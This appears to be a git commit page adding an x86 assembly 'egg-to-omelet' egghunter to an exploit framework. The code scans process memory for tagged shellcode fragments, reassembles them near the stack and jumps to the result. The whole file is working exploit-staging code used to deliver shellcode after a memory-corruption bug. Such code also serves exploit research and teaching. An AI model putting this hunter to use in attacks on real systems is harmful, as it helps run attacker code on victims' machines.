add omlet stub asm source
git-svn-id: file:///home/svn/framework3/trunk@10110 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
d2bada79a9
commit
15c7a25d68
|
@ -0,0 +1,100 @@
|
||||||
|
;--------------------------------------------------
|
||||||
|
;corelanc0d3r - egg-to-omelet hunter - null byte free
|
||||||
|
;v1.0
|
||||||
|
;http://www.corelan.be:8800
|
||||||
|
;peter.ve@corelan.be
|
||||||
|
;--------------------------------------------------
|
||||||
|
BITS 32
|
||||||
|
|
||||||
|
nr_eggs equ 0x2 ;number of eggs
|
||||||
|
egg_size equ 0x7b ;123 bytes of payload per egg
|
||||||
|
|
||||||
|
jmp short start
|
||||||
|
|
||||||
|
;routine to calculate the target location
|
||||||
|
;for writing recombined shellcode (omelet)
|
||||||
|
;I'll use EDI as target location
|
||||||
|
;First, I'll make EDI point to end of stack
|
||||||
|
;and I'll put the number of shellcode eggs in eax
|
||||||
|
get_target_loc:
|
||||||
|
;get stack pointer and put it in EDI
|
||||||
|
push esp
|
||||||
|
pop edi
|
||||||
|
;set EDI to end of stack
|
||||||
|
or di,0xffff ;edi=0x....ffff = end of current stack frame
|
||||||
|
mov edx,edi ;use edx as start location for the search
|
||||||
|
xor eax,eax ;zero eax
|
||||||
|
mov al,nr_eggs ;put number of eggs in eax
|
||||||
|
calc_target_loc:
|
||||||
|
xor esi,esi ;use esi as counter to step back
|
||||||
|
mov si,0-egg_size+20 ;add 20 bytes of extra space, per egg
|
||||||
|
|
||||||
|
get_target_loc_loop: ;start loop
|
||||||
|
dec edi ;step back
|
||||||
|
inc esi ;and update ESI counter
|
||||||
|
cmp si,-1 ;continue to step back until ESI = -1
|
||||||
|
jnz get_target_loc_loop
|
||||||
|
dec eax ;loop again if we did not take all pieces
|
||||||
|
;into account yet
|
||||||
|
jnz calc_target_loc
|
||||||
|
;edi now contains target location for recombined shellcode
|
||||||
|
xor ebx,ebx ;put loop counter in ebx
|
||||||
|
mov bl,nr_eggs+1
|
||||||
|
ret
|
||||||
|
|
||||||
|
start:
|
||||||
|
call get_target_loc ;jump to routine which will calculate shellcode
|
||||||
|
;target address
|
||||||
|
|
||||||
|
;start looking, using edx as basepointer
|
||||||
|
jmp short search_next_address
|
||||||
|
find_egg:
|
||||||
|
dec edx ;scasd does edx+4, so dec edx 4 times + inc edx one time
|
||||||
|
; to make sure we don't miss any pointers
|
||||||
|
dec edx
|
||||||
|
dec edx
|
||||||
|
dec edx
|
||||||
|
search_next_address:
|
||||||
|
inc edx ;next one
|
||||||
|
push edx ;save edx
|
||||||
|
push byte +0x02
|
||||||
|
pop eax ;set eax to 0x02
|
||||||
|
int 0x2e
|
||||||
|
cmp al,0x5 ;address readable ?
|
||||||
|
pop edx ;restore edx
|
||||||
|
je search_next_address ;if address is not readable, go to next address
|
||||||
|
mov eax,0x77303001 ;if address is readable, prepare tag in eax
|
||||||
|
add eax,ebx ;add offset (ebx contains egg counter, remember ?)
|
||||||
|
xchg edi,edx ;switch edx/edi
|
||||||
|
scasd ;edi points to the tag ?
|
||||||
|
xchg edi,edx ;switch edx/edi back
|
||||||
|
jnz find_egg ;if tag was not found, go to next address
|
||||||
|
;found the tag at edx
|
||||||
|
|
||||||
|
copy_egg:
|
||||||
|
;ecx must first be set to egg_size (used by rep instruction)
|
||||||
|
;and esi as source
|
||||||
|
mov esi,edx ;set ESI = EDX (needed for rep instruction)
|
||||||
|
xor ecx,ecx
|
||||||
|
mov cl,egg_size ;set copy counter
|
||||||
|
rep movsb ;copy egg from ESI to EDI
|
||||||
|
dec ebx ;decrement egg
|
||||||
|
cmp bl,1 ;found all eggs ?
|
||||||
|
jnz find_egg ;no = look for next egg
|
||||||
|
; done - all eggs have been found and copied
|
||||||
|
|
||||||
|
done:
|
||||||
|
call get_target_loc ; re-calculate location where recombined shellcode is placed
|
||||||
|
jmp edi ; and jump to it :)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue